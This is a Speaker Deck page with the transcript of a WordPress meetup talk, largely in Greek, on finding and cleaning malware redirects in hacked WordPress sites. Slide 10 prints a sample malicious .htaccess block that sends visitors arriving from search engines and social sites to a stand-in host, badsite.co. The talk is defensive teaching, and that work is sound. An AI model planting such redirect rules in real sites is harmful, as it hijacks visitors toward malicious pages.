Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Detect and Remove WordPress Malware Redirect

Avatar for makmour makmour
November 01, 2018
Technology
0
79

Detect and Remove WordPress Malware Redirect

Makis Mourelatos - 16th Athens WordPress Meetup
Avatar for makmour

makmour

November 01, 2018
Tweet

More Decks by makmour

See All by makmour
How to clean a Hacked WordPress website
Avatar for makmour makmour
0
29
The WordPress X-Files
Avatar for makmour makmour
0
66
How to Detect and Secure a WordPress Hacked site
Avatar for makmour makmour
0
120
WordPress Hardening Rules 101
Avatar for makmour makmour
0
87
WordPress Security 101 Seminar - WordPress security real cases of hacked sites
Avatar for makmour makmour
0
18
WordPress Security 101 Seminar - WordPress Security: real cases of hacked sites
Avatar for makmour makmour
0
34
Developing a WordPress Startup
Avatar for makmour makmour
0
34
How to protect your WordPress site from DDoS and bruteforce attacks
Avatar for makmour makmour
0
32

Other Decks in Technology

See All in Technology
DroidKnights 2025 - Jetpack XR 살펴보기: XR 개발은 어떻게 이루어지는가?
Avatar for Quokkaman heesung6701
1
150
_第3回__AIxIoTビジネス共創ラボ紹介資料_20250617.pdf
Avatar for AIxIoTビジネス共創ラボ iotcomjpadmin
0
120
今からでも間に合う! 生成AI「RAG」再入門 / Re-introduction to RAG in Generative AI
Avatar for Hideaki Aoyagi hideakiaoyagi
1
190
キャディでのApache Iceberg, Trino採用事例 -Apache Iceberg and Trino Usecase in CADDi--
Avatar for recruiting@caddi.jp caddi_eng
0
150
(新URLに移行しました)FASTと向き合うことで見えた、大規模アジャイルの難しさと楽しさ
Avatar for Kyosuke Awata wooootack
0
750
Kotlinで学ぶ 代数的データ型
Avatar for Kanon ysknsid25
5
1.1k
本部長の代わりに提案書レビュー! KDDI営業が毎日使うAIエージェント「A-BOSS」開発秘話
Avatar for みのるん minorun365
PRO
14
1.9k
Snowflake Intelligenceで 実現できるノーコードAI活用
Avatar for tak takumimukaiyama
1
270
“プロダクトを好きになれるか“も QAエンジニア転職の大事な判断基準だと思ったの
Avatar for yuden tomodakengo
0
210
Claude Code どこまでも/ Claude Code Everywhere
Avatar for nwiizo nwiizo
50
30k
生成AIをテストプロセスに活用し"よう"としている話 #jasstnano
Avatar for Makky makky_tyuyan
0
230
堅牢な認証基盤の実現 TypeScriptで代数的データ型を活用する
Avatar for KAKEHASHI kakehashi
PRO
2
240

Featured

See All Featured
Templates, Plugins, & Blocks: Oh My! Creating the theme that thinks of everything
Avatar for Michelle Schulp Hunt marktimemedia
31
2.4k
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
Avatar for soudai sone soudai
PRO
181
53k
Become a Pro
Avatar for Speaker Deck speakerdeck
PRO
28
5.4k
Fireside Chat
Avatar for paigeccino paigeccino
37
3.5k
Agile that works and the tools we love
Avatar for Rasmus Luckow-Nielsen rasmusluckow
329
21k
Easily Structure & Communicate Ideas using Wireframe
Avatar for Afnizar Nur Ghifari afnizarnur
194
16k
Building Better People: How to give real-time feedback that sticks.
Avatar for Will Jessup wjessup
367
19k
Raft: Consensus for Rubyists
Avatar for Patrick Van Stee vanstee
140
7k
A Modern Web Designer's Workflow
Avatar for Chris Coyier chriscoyier
693
190k
XXLCSS - How to scale CSS and keep your sanity
Avatar for Zaharenia Atzitzikaki sugarenia
248
1.3M
Bootstrapping a Software Product
Avatar for Garrett Dimon garrettdimon
PRO
307
110k
Rails Girls Zürich Keynote
Avatar for Gregor Martynus gr2m
94
14k

Transcript

  1. Gerasimos Mourelatos WordPress Security Aficionado “… there are only two

    types of companies: those that have been hacked and those that will be.” Robert Mueller, FBI Director, 2012 @makismour

  2. 16th WordPress Athens Meetup Εντ οπισμός και Αφαίρεση Malware Redirect

  3. source: internetlivestats.com

  4. FACTS source: codeinwp.com/blog/wordpress-statistics Το WordPress έχει τις περισσότερες παραβιάσεις από

    hackers, αυτό όμως δεν σημαίνει ότι είναι και το πιο ευάλωτο. TimThumb, Revslider & Gravity Forms είναι από τα αγαπημένα plugin όσων θέλουν να παραβιάσουν μια WordPress ιστοσελίδα. Μία από τις πιο συνηθισμένες παραβιάσεις είναι τα malicious ή malware redirects.

  5. MALWARE REDIRECT FIVE Ws Who What Where When Why Ένας

    ή περισσότεροι hacker H WordPress ιστοσελίδα σας κάνει redirect σε μια άλλη -ξένη- ιστοσελίδα .htaccess, theme files, plugin files Όταν εσείς κοιμόσαστε!!! Blackhat SEO, Drive by Download

  6. 1. WORDPRESS WEBSITE SCAN Hosting Provider Quttera Virus Total Web

    Inspector

  7. 2. CLOAKING ΕΛΕΓΧΟΣ ΓΙΑ Fetch Google ΒotSimulator

  8. 3. GOOGLE SITE STATUS ΕΛΕΓΧΟΣ

  9. 4. MALWARE ΕΝΤΟΠΙΣΜΟΣ .htaccess located at root & uploads dir

    wp-config.php theme’s header.php footer.php functions.php

  10. .HTACCESS RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR] RewriteCond

    %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC,OR] RewriteCond %{HTTP_REFERER} .twitter. [OR] RewriteCond %{HTTP_REFERER} .blog. [OR] RewriteCond %{HTTP_REFERER} .live. [OR] RewriteCond %{HTTP_REFERER} .myspace. [OR] RewriteCond %{HTTP_REFERER} .linkedin. [OR] RewriteRule .* http://badsite.co/bad.php?m=123 [R,L]

  11. WP-CONFIG.PHP

  12. THEME'S HEADER.PHP

  13. THEME'S FOOTER.PHP

  14. MALWARE ΑΦΑΙΡΕΣΗ

  15. BACKUP!!!!! Αφαίρεση και εκ νέου εγκατάσταση WordPress Αφαίρεση και εκ

    νέου εγκατάσταση όλων των theme Αφαίρεση και εκ νέου εγκατάσταση όλων των plugin MALWARE ΤΟ ΚΡΥΒΕΤΑΙ ΣΤΙΣ ΛΕΠΤΟΜΕΡΕΙΕΣ

  16. Έλεγχος όλων των admin users Έλεγχος και διαγραφή όλων των

    μη WordPress αρχείων και directory Επανάληψη της διαδικασίας σε όλες της ιστοσελίδες που ανήκουν στον ίδιο hosting account MALWARE ΤΟ ΚΡΥΒΕΤΑΙ ΣΤΙΣ ΛΕΠΤΟΜΕΡΕΙΕΣ

  17. • https://wordpress.org/about/security/ • https://malwaredecoder.com/ • https://quttera.com/ • https://www.virustotal.com • https://app.webinspector.com/

    • https://www.google.com/webmasters/tools/googlebot- fetch • https://transparencyreport.google.com/safe-browsing/ search • https://www.linkedin.com/in/makismour/ USEFUL RESOURCES
  18. None